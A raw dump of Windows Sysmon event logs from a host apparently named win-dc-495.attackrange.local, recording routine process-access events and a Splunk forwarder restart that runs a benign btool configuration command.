13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8EE2-6005-AE00-00000000A301}41364140C:\Windows\system32\cmd.exe{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000003553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.816{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-log 10341000x80000000000000003552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+13ac4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program 
Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AD00-00000000A301}3920C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 